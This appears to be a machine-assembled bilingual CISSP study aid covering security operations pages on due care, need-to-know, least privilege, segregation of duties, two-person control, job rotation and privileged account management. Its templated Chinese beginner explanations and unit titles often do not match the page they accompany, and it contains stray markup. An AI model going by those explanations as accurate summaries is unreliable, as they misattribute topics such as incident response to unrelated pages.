7.5.2 Media protection techniques 7.5.3 Data at rest/data in transit 7.8 Implement and support patch and vulnerability management 7.9 Understand and participate in change management processes 7.15 Address personnel safety and security concerns 7.15.1 Travel 7.15.2 Security training and awareness (e.g., insider threat, social media impacts, two-factor authentication (2FA) fatigue) 7.15.3 Emergency management 7.15.4 Duress Domain 8: Software Development Security 8.4 Assess security impact of acquired software 8.4.4 Managed services (e.g., enterprise applications) 8.4.5 Cloud services (e.g., Software as a Service (SaaS), Infrastructure as a Service (IaaS), Platform as a Service (PaaS)) Security operations includes a wide range of security foundational concepts and best practices.

These include several core concepts that any organization needs to implement to provide basic security protection. The first section of this chapter covers these concepts. Resource protection ensures that information and assets are securely provisioned when they're deployed and throughout their life cycle. Configuration management ensures that systems are configured correctly, and change management processes protect against outages from unauthorized changes. Patch and vulnerability management controls ensure that systems are up-to-date and protected against known vulnerabilities.

Apply Foundational Security Operations Concepts The primary purpose of IT security operations practices is to safeguard assets such as information, systems, devices, facilities, and applications. These 7.5.2

中文直译 / 整理

媒体保护技术 7.5.3 静态数据/传输中的数据 7.8 实施和支持补丁和漏洞管理 7.9 理解并参与变更管理流程 7.15 处理人员安全和安保问题 7.15.1 出行 7.15.2 安全培训与意识(例如,内部威胁、社交媒体影响、双因素 认证(2FA)疲劳) 7.15.3 应急管理 7.15.4 强迫 领域 8:软件开发安全 8.4 评估所采购软件的安全影响 8.4.4 管理服务(例如,企业应用程序) 8.4.5 云服务(例如,软件即服务(SaaS)、基础设施 即服务(IaaS)、平台即服务(PaaS)) 安全运营包括广泛的安全基础概念和最佳实践。 这些概念包含任何组织为提供 基本安全保护都需要实施的核心内容。 本章的第一部分将介绍这些概念。 资源保护确保在部署信息和资产时以及在整个生命周期中对其进行安全配置。 配置管理确保系统正确配置,变更管理流程可防止因未经授权的变更导致的服 务中断。 补丁和漏洞管理控制确保系统保持最新状态,并防范已知漏洞。 应用基础安全运营概念 IT安全运营实践的主要目的是保护信息、系统、设备、设施和应用程序等资产。 这 些

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 03 / PDF P1089

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

practices help identify threats and vulnerabilities and implement controls to reduce the risk to these assets. In the context of IT security, due care and due diligence refer to taking reasonable care to protect an organization's assets on an ongoing basis. Senior management has a direct responsibility to exercise due care and due diligence. Implementing the common security operations concepts covered in the following sections, along with performing periodic security audits and reviews, demonstrates a level of due care and due diligence that will reduce senior management's liability when a loss occurs. Exam Tip Remember to keep the concepts of due care and due diligence top of mind.

Chapter 1, “Security Governance Through Principles and Policies,” included a complete discussion of those topics. Need-to-Know and Least Privilege Need-to-know and the principle of least privilege are two standard principles followed in any secure IT environment. They help protect valuable assets by limiting access to these assets. Though they are related and many people use the terms interchangeably, there is a distinctive difference between the two. Need-to-Know Access The need-to-know principle imposes the requirement to grant users access only to data or resources they need to perform assigned work tasks. The primary purpose is to keep secret information secret.

If you want to keep a secret, the best way is to tell no one. If you're the only person who knows it, you can ensure that it remains a secret. If you tell a trusted friend, it might remain secret. However, your trusted friend might tell someone else—such as another trusted friend. The risk of the secret leaking out to others increases as more and more people learn it. Limit the people who know the secret, and you increase the chances of keeping it secret. Need-to-know is commonly associated with security clearances, such as a person having a Secret clearance. However, the clearance doesn't automatically grant access to the data. As an example, imagine that Sally has a Secret clearance.

This indicates that she is cleared to access Secret data.

中文直译 / 整理

实践有助于识别威胁和漏洞,并实施控制措施以降低这些资产的风险。 在IT安全的背景下,尽职关怀和尽职调查是指持续采取合理措施保护组织的资 产。 高级管理层有直接责任来实施尽职关怀和尽职调查。 通过实施以下章节中 涵盖的常见安全运营概念,并定期进行安全审计和审查,可以展示出一定程度 的尽职关怀和尽职调查,从而在发生损失时降低高级管理层的责任。 考试提示 请时刻牢记尽职关怀和尽职调查的概念。 第1章,“通过原则和政策实现 安全治理”,对这些主题进行了全面讨论。 按需知晓与最小权限 按需知晓和最小权限原则是任何安全IT环境中遵循的两项标准原则。 它们通过 限制对这些资产的访问来保护宝贵资产。 尽管这两者相关,且许多人互换使用 这两个术语,但两者之间存在明显区别。 按需知晓访问 《style id='1'>按需知晓原则要求仅授予用户执行分配工作任务所需的数据或资 源访问权限。 其主要目的是保密信息。 如果你想保守秘密,最好的方法就是谁 也不告诉。 如果你是唯一知道它的人,你就能确保它始终是秘密。 如果你告诉 一位值得信赖的朋友,它可能仍然是秘密。 然而,你的值得信赖的朋友可能会 告诉别人——比如另一位值得信赖的朋友。

知道秘密的人越多,秘密泄露给他 人风险就越大。 限制知道秘密的人数,就能提高保密的可能性。 按需知悉通常与安全许可相关,例如某人拥有秘密级许可。 然而,该许可并不 会自动授予其访问数据的权限。 以萨莉为例,她拥有秘密级许可,这表明她被 授权访问秘密级数据。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 04 / PDF P1090

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

However, the clearance doesn't automatically grant her access to all Secret data. Instead, administrators grant her access to only the Secret data she has a need-to-know for her job. Although need-to-know is most often associated with military and government agencies’ clearances, it can also apply in civilian organizations. For example, database administrators may need access to a database server to perform maintenance, but they don't need access to all the data within the server's databases. Restricting access on a need-to-know basis helps protect against unauthorized access that could result in a loss of confidentiality.

The Principle of Least Privilege The least privilege principle states that subjects are granted only the privileges necessary to perform assigned work tasks and no more. Keep in mind that privilege in this context includes both permissions to data and rights to perform systems tasks. For data, it includes controlling the ability to read, write, create, alter, or delete data. Limiting and controlling privileges based on this concept protects confidentiality and data integrity. If users can modify only those data files that their work tasks require them to modify, it protects other files’ integrity in the environment.

The least privilege principle relies on the assumption that all users have a well-defined job description that personnel understand. Without a specific job description, it is not possible to know what privileges users need. This principle extends beyond just accessing data, though—it also applies to system access. For example, in many networks regular users can log on to any computer in the network using a network account. However, organizations commonly restrict this privilege by preventing regular users from logging on to servers or restricting users’ access to a single workstation.

Organizations sometimes violate this principle by adding all users to the local Administrators group or granting root access to a computer. This gives the users full control over the computer. However, regular users rarely need this much access. When they have this much access, they can accidentally (or intentionally) damage the system, such as accessing or deleting valuable data.

中文直译 / 整理

然而,该许可并不会自动授予她访问所有秘密级数据的权限。 相反,管理员只 会根据她的工作需要,授予她访问相关秘密级数据的权限。 尽管‘必需知道’原则最常与军事和政府机构的权限相关联,但它同样适用于 民用组织。 例如,数据库管理员可能需要访问数据库服务器以执行维护工作, 但他们并不需要访问服务器数据库中的所有数据。 基于必需知道原则限制访问 有助于防止未经授权的访问,从而保护机密性。 最小权限原则 最小权限原则规定,主体仅被授予执行分配工作任务所必需的权限,且不得超 出。 请注意,此处的权限既包括对数据的访问权限,也包括执行系统任务的权 利。 对于数据而言,它包括控制读取、写入、创建、修改或删除数据的能力。 基于这一概念限制和控制权限,有助于保护机密性和数据完整性。 如果用户只 能修改其工作任务所需的那些数据文件,则可以保护环境中其他文件的完整性。 最小权限原则依赖于这样一个假设:所有用户都有明确的职位描述, 且相关人员对此有所了解。 如果没有具体的职位描述,就无法确定用户需 要哪些权限。 这一原则不仅限于数据访问,还适用于系统访问。 例如,在许多网络中,普通 用户可以使用网络账户登录网络中的任何计算机。

然而,组织通常通过阻止普 通用户登录服务器或限制用户仅能访问单台工作站来限制这一权限。 组织有时会通过将所有用户添加到本地管理员组或授予计算机的根访问权限来 违反这一原则。 这使用户对计算机拥有完全控制权。 然而,普通用户很少需要 如此高的权限。 当他们拥有如此高的权限时,可能会意外(或故意)损坏系统, 例如访问或删除重要数据。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 05 / PDF P1091

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Additionally, if a user logs on with full administrative privileges and inadvertently installs malware, the malware can assume full administrative privileges of the user's account. In contrast, if the user logs on with a regular user account, malware can only assume the regular account's limited privileges. Chapter 14, “Controlling and Monitoring Access,” discussed this in more depth within the context of privilege escalation. Least privilege is typically focused on ensuring that user privileges are restricted, but it also applies to other subjects, such as applications and system processes.

For example, services and applications often run under the context of an account specifically created for the service or application. Historically, administrators often gave these service accounts full administrative privileges without considering the principle of least privilege. If attackers compromise the application, they can potentially assume the service account's privileges, granting the attacker full administrative privileges. Segregation of Duties (SoD) and Responsibilities Segregation of duties (SoD) and responsibilities ensures that no single person has total control over a critical function or system.

This is necessary to ensure that no single person can compromise the system or its security. Instead, two or more people must conspire or collude against the organization, which increases the risk for these people. Exam Tip Segregation of duties is also known as separation of duties. Fortunately, both share the same SoD acronym. If you see either phrase on the CISSP exam, know that they are synonymous. A segregation of duties policy creates a checks-and-balances system where two or more users verify each other's actions and must work in concert to accomplish necessary work tasks.

This makes it more difficult for individuals to engage in malicious, fraudulent, or unauthorized activities and broadens the scope of detection and reporting. In contrast, individuals may be more tempted to perform unauthorized acts if they think they can get away with them. With two or more people involved, the risk of detection increases and acts as an effective deterrent.

中文直译 / 整理

此外,如果用户以完全管理员权限登录并无意中安装了恶意软件,该恶意软件 将获得该用户账户的完全管理员权限。 相反,如果用户以普通用户账户登录, 恶意软件只能获得该普通账户的有限权限。 第14章“控制和监控访问”在特权 提升的背景下对此进行了更深入的讨论。 最小权限原则通常侧重于确保用户权限受到限制,但它也适用于其他主体,例 如应用程序和系统进程。 例如,服务和应用程序通常在为该服务或应用程序专 门创建的账户上下文中运行。 历史上,管理员常常在不考虑最小权限原则的情 况下,赋予这些服务账户完整的管理权限。 如果攻击者入侵了应用程序,他们 可能就会接管服务账户的权限,从而获得完整的管理权限。 职责分离(SoD)与责任 职责分离(SoD)与责任确保没有任何一个人对关键功能或系统拥有完全控制 权。 这是必要的,以确保没有任何一个人能够破坏系统或其安全性。 相反,必 须有两人或更多人合谋或串通对抗组织,这增加了这些人的风险。 考试提示 职责分离也称为权限分离。 幸运的是,两者都使用相同的SoD缩写。 如果 在CISSP考试中看到其中任何一个短语,请知道它们是同义的。

职责分离政策创建了一种制衡机制,其中两名或多名用户相互验证彼此的操作, 并必须协同合作才能完成必要的工作任务。 这使得个人更难从事恶意、欺诈或 未经授权的活动,并扩大了检测和报告的范围。 相反,如果个人认为自己可以 逃避惩罚,他们可能更容易 tempted 进行未经授权的行为。 当涉及两名或多 名人员时,被发现的风险增加,从而起到有效的威慑作用。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 06 / PDF P1092

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Here's a simple example. Movie theaters use segregation of duties to prevent fraud. One person sells tickets. Another person collects the tickets and doesn't allow entry to anyone who doesn't have a ticket. If the same person collects the money and grants entry, this person can allow people in without a ticket or pocket the collected money without issuing a ticket. Of course, the ticket seller and the ticket collector can get together and concoct a plan to steal from the movie theater. This is collusion because it is an agreement between two or more persons to perform some unauthorized activity. However, collusion takes more effort and increases the risk to each of them.

Segregation of duties policies help reduce fraud by requiring collusion between two or more people to perform unauthorized activity. Similarly, organizations often break down processes into multiple tasks or duties and assign these duties to different individuals to prevent fraud. For example, one person approves payment for a valid invoice, but someone else makes the payment. If one person controlled the entire process of approval and payment, it would be easy to approve bogus invoices and defraud the company. Another way segregation of duties is enforced is by dividing the security or administrative capabilities and functions among multiple trusted individuals.

When the organization divides administration and security responsibilities among several users, no single person has sufficient access to circumvent or disable security mechanisms. Two-Person Control Two-person control (sometimes called the two-man rule) requires the approval of two individuals for critical tasks. For example, safe deposit boxes in banks often require two keys. A bank employee controls one key, and the customer holds the second key. Both keys are required to open the box, and bank employees allow a customer access to the box only after verifying the customer's identification.

Using two-person controls within an organization ensures peer review and reduces the likelihood of collusion and fraud. For example, an organization can require two individuals within the company (such as the chief financial officer and the chief executive officer) to approve key business decisions. Additionally, some privileged activities can be configured so that they require two administrators to work together to complete a task. As an example, some privilege access management (PAM) solutions create special administrative

中文直译 / 整理

这里有一个简单的例子。 电影院使用职责分离来防止欺诈。 一个人负责售票, 另一个人负责检票,并不允许任何没有票的人进入。 如果同一个人既收钱又放 行,他就可以在不发票的情况下让人员进入,或者在不发票的情况下私吞收入。 当然,售票员和检票员也可能串通起来策划偷窃电影院的行为。 这是一种串通 行为,因为它是两人或多人之间达成的从事某种未经授权活动的协议。 然而, 串通需要更多努力,并增加了每个人的风险。 职责分离政策通过要求两人或多 人串通才能实施未经授权的行为,有助于减少欺诈。 同样,组织通常将流程分解为多个任务或职责,并将这些职责分配给不同人员, 以防止欺诈。 例如,一个人批准有效发票的付款,但另一个人执行付款。 如果 一个人控制了整个审批和付款流程,就很容易批准虚假发票并欺诈公司。 职责分离的另一种实施方式是将安全或管理权限和功能分配给多个可信人员。 当组织将管理与安全职责分配给多个用户时,没有任何一个人拥有足够的权限 来规避或禁用安全机制。 双人控制 双人控制(有时称为两人规则)要求关键任务必须经过两名人员的批准。 例如, 银行的保管箱通常需要两把钥匙。 一名银行员工保管一把钥匙,客户持有第二 把钥匙。

打开保管箱需要两把钥匙同时使用,银行员工只有在核实客户身份后, 才允许客户访问保管箱。 在组织内部采用双人控制机制可确保同行审查,并降低串通和欺诈的可能性。 例如,组织可以要求公司内两名人员(如首席财务官和首席执行官)共同批 准关键业务决策。 此外,某些特权活动可以配置为需要两名管理员协同完成任务。 例如,某些特 权访问管理(PAM)解决方案会创建仅用于紧急情况的管理员账户

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 07 / PDF P1093

第 1093 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

accounts for emergency use only. The password is split in half so that two people need to enter the password to log on. Split knowledge combines the concepts of segregation of duties and twoperson control into a single solution. The basic idea is that the information or privilege required to perform an operation is divided among two or more users. This ensures that no single person has sufficient privileges to compromise the security of the environment. Job Rotation Job rotation (sometimes called rotation of duties) means that employees rotate through jobs or rotate job responsibilities with other employees.

Using job rotation as a security control provides peer review, reduces fraud, and enables cross-training. Cross-training helps make an environment less dependent on any single individual. A job rotation policy can act as both a deterrent and a detection mechanism. If employees know that someone else will be taking over their job responsibilities in the future, they are less likely to take part in fraudulent activities. If they choose to do so anyway, individuals taking over the job responsibilities later are likely to discover the fraud. Mandatory Vacations Many organizations require employees to take mandatory vacations in oneweek or two-week increments.

This provides a form of peer review and helps detect fraud and collusion. This policy ensures that another employee takes over an individual's job responsibilities for at least a week. If an employee is involved in fraud, the person taking over the responsibilities is likely to discover it. Mandatory vacations can act as both a deterrent and a detection mechanism, just as job rotation policies can. Even though someone else will take over a person's responsibilities for just a week or two, this is often enough to detect irregularities.

中文直译 / 整理

密码被拆分为两部分,因此需要两人分别输入密码才能登录。 知识分割将职责分离和双人控制的概念结合为一个整体解决方案。 其基本思想 是,执行操作所需的信息或权限被分配给两个或多个用户。 这确保了没有任何 单个用户拥有足以危及环境安全的足够权限。 岗位轮换 岗位轮换(有时称为职责轮换)是指员工在不同岗位之间轮换,或与其他员工 轮换工作职责。 将岗位轮换作为安全控制措施,可以提供同行审查、减少欺诈 行为,并促进交叉培训。 交叉培训有助于降低环境对任何单一人员的依赖。 岗位轮换政策既可以作为威慑手段,也可以作为检测机制。 如果员工知道未 来将有其他人接替他们的工作职责,他们参与欺诈活动的可能性就会降低。 即使他们仍然选择这样做,后来接替其职责的人员也很可能发现欺诈行为。 强制休假 许多组织要求员工以一周或两周为周期进行强制休假。 这提供了一种同行审查 形式,并有助于发现欺诈和串通行为。 该政策确保另一位员工至少接管该员工 的工作职责一周。 如果某员工涉及欺诈,接替其职责的人很可能发现该行为。 强制休假既可以起到威慑作用,也可以作为检测机制,就像岗位轮换政策 一样。 即使另一个人仅接管某人的职责一两周,这也通常足以发现异常情况。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1093 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 08 / PDF P1094

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Financial organizations are at risk of significant losses from fraud by employees. They often use job rotation, segregation of duties and responsibilities, and mandatory vacation policies to reduce these risks. Combined, these policies help prevent incidents and help detect them when they occur. Privileged Account Management Privileged account management (PAM) solutions restrict access to privileged accounts or detect when accounts use any elevated privileges. In this context, privileged accounts are administrator accounts or any accounts that have specific elevated privileges. This can include help desk workers who have been granted limited privileges to perform certain activities.

In Microsoft domains, this includes local administrator accounts (who have full control over a computer), users in the Domain Admins group (who have full control of any computers in a domain), and users in the Enterprise Admins group (who have full control over all the domains in a forest). In Linux, this includes anyone using the root account or granted root access via sudo. Chapter 14 discussed some common Kerberos attacks allowing attackers to take control of admin accounts. It also discusses the sudo account. Microsoft domains include a privileged access management (PAM) solution that can restrict privileged access. It's based on a Just-in-Time administration principle.

Users are placed in a privileged group, but members of the group don't have elevated privileges. Instead, they request permission to use elevated privileges when they need them. The PAM solution approves this request behind the scenes and grants it within seconds by issuing a timelimited ticket. The user only has elevated privileges for a specific time, such as 15 minutes. After the time is up, the ticket expires. This approach thwarts common Kerberos attacks because the tickets quickly expire. Even if an attacker harvests one of these tickets, it is unusable.

中文直译 / 整理

金融机构面临员工欺诈导致重大损失的风险。 它们通常采用岗位轮换、 职责分离和强制休假政策来降低这些风险。 这些政策结合使用,有助于防止 事件发生,并在事件发生时加以发现。 特权账户管理 特权账户管理(PAM)解决方案限制对特权账户的访问,或在账户使用任何提 升权限时发出警报。 在此上下文中,特权账户是指管理员账户或任何具有特定 提升权限的账户。 这可能包括被授予有限权限以执行特定活动的帮助台工作人 员。 在Microsoft域中,这包括本地管理员账户(对计算机拥有完全控制权)、 Domain Admins组中的用户(对域中的任何计算机拥有完全控制权)以及 Enterprise Admins组中的用户(对林中的所有域拥有完全控制权)。 在 Linux中,这包括使用root账户或通过sudo获得root访问权限的任何人。 第14章讨论了一些常见的Kerberos攻击,这些攻击允许攻击者控制管 理员账户。 它还讨论了sudo账户。 Microsoft 域包含一种特权访问管理(PAM)解决方案,可限制特权访问。 该 方案基于即时(Just‑in‑Time)管理原则。 用户被置于特权组中,但组成员并 不拥有提升的权限。

相反,当他们需要时,会请求使用提升权限。 PAM 解决方 案在后台批准此请求,并在几秒钟内通过发放一个限时票据来授予权限。 用户 仅在特定时间内(例如 15 分钟)拥有提升权限。 时间结束后,票据过期。 这种 方法能有效阻止常见的 Kerberos 攻击,因为票据会迅速过期。 即使攻击者窃 取了其中一个票据,它也无法使用。

小白解释

场景先行:你是公司的安全负责人,正在读第 1094 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
